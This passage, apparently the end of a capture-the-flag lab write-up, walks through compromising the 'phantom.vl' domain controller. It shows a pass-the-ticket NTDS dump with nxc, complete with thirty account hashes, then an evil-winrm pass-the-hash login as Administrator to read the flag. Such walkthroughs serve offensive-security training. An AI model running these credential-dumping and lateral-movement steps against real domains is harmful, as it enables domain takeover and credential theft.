┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
```

Once we receive the forged service ticket, we leverage Pass-The-Ticket to dump the machine hashes and authenticate through WinRM as the domain admin.

```bash
┌──(kali㉿kali)-[~]
└─$ nxc smb DC.phantom.vl --use-kcache --ntds 
SMB         DC.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         DC.phantom.vl   445    DC               [+] phantom.vl\Administrator from ccache (Pwn3d!)
SMB         DC.phantom.vl   445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         DC.phantom.vl   445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa2abd9db4f5984e657f834484512117:::
SMB         DC.phantom.vl   445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         DC.phantom.vl   445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:de0c6c1bf90cdc90ed73c2b765793df6:::
SMB         DC.phantom.vl   445    DC               phantom.vl\svc_sspr:1103:aad3b435b51404eeaad3b435b51404ee:8ecffccc2f22c1607b8e104296ffbf68:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\rnichols:1112:aad3b435b51404eeaad3b435b51404ee:6e2c9daa1d71941ea201a79fe134008a:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\pharrison:1113:aad3b435b51404eeaad3b435b51404ee:744cc56188561af3c16a8d0cd1e758d1:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\wsilva:1114:aad3b435b51404eeaad3b435b51404ee:b163d04c52cc2d88cc59ce6a9078b228:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\elynch:1115:aad3b435b51404eeaad3b435b51404ee:753389c36525eaa2182d2366e21cb37e:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\nhamilton:1116:aad3b435b51404eeaad3b435b51404ee:2d3aa57851c7686d3d3df4c2bf3ebbb8:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\lstanley:1117:aad3b435b51404eeaad3b435b51404ee:3945cd9505e0eca3621a4b61506a131a:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\bbarnes:1118:aad3b435b51404eeaad3b435b51404ee:8b86efbee20746efcf97d50081a7ada9:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\cjones:1119:aad3b435b51404eeaad3b435b51404ee:0253df7e458eedfc1b511ae1eadad057:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\agarcia:1120:aad3b435b51404eeaad3b435b51404ee:54199065e48fae91d67176d5d2c3d506:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\ppayne:1121:aad3b435b51404eeaad3b435b51404ee:e628d1e4d23696da908acc1add7efbe4:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\ibryant:1122:aad3b435b51404eeaad3b435b51404ee:ca996d2266c0e306701b78a06e3c29ab:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\ssteward:1123:aad3b435b51404eeaad3b435b51404ee:5839c34d11b418846131f6944be80ca6:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\wstewart:1124:aad3b435b51404eeaad3b435b51404ee:1d2256228378d2093d25f5122981bcde:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\vhoward:1125:aad3b435b51404eeaad3b435b51404ee:fc97143b237f56c06e0d4f4bff1c7a09:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\crose:1126:aad3b435b51404eeaad3b435b51404ee:37d7a42022f4c0bc1efdc5d9c0d5eb33:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\twright:1127:aad3b435b51404eeaad3b435b51404ee:f082f34b171dd47297674c2be83991b7:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\fhanson:1128:aad3b435b51404eeaad3b435b51404ee:3ecba7b39ce4b3fbe05362d6e05d31d0:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\cferguson:1129:aad3b435b51404eeaad3b435b51404ee:74bb37fa58020392821cdb89b5098f2d:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\alucas:1130:aad3b435b51404eeaad3b435b51404ee:53bd6a54d3dd605385e55f3226b0814d:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\ebryant:1131:aad3b435b51404eeaad3b435b51404ee:abf123fca11a39c94bd92505f61c12a5:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\vlynch:1132:aad3b435b51404eeaad3b435b51404ee:c6837ff88c25daea76b0f390f7ab0552:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\ghall:1133:aad3b435b51404eeaad3b435b51404ee:a1ca032e6023ddeedd9009d4c0a8c836:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\ssimpson:1134:aad3b435b51404eeaad3b435b51404ee:1c029611755dfa697b1996f88a8d9c17:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\ccooper:1135:aad3b435b51404eeaad3b435b51404ee:fc35a773ba47633c4c1a807f91e9d496:::
SMB         DC.phantom.vl   445    DC               PHANTOM.vl\vcunningham:1136:aad3b435b51404eeaad3b435b51404ee:c187274e5ff6a96c44bce6200d6e7944:::
SMB         DC.phantom.vl   445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:648605bbb93c66d7754580cb850957fc:::
SMB         DC.phantom.vl   445    DC               [+] Dumped 30 NTDS hashes to /home/kali/.nxc/logs/ntds/DC_DC.phantom.vl_2026-03-05_155103.ntds of which 29 were added to the database
SMB         DC.phantom.vl   445    DC               [*] To extract only enabled accounts from the output file, run the following command: 
SMB         DC.phantom.vl   445    DC               [*] grep -iv disabled /home/kali/.nxc/logs/ntds/DC_DC.phantom.vl_2026-03-05_155103.ntds | cut -d ':' -f1
```

Now we can obtain the flag from `C:\Users\Administrator\Desktop\root.txt`.

```bash
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i phantom.vl -u administrator -H aa2abd9db4f5984e657f834484512117

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
18f4xxxxxxxxxxxxxxxxx4d20
```
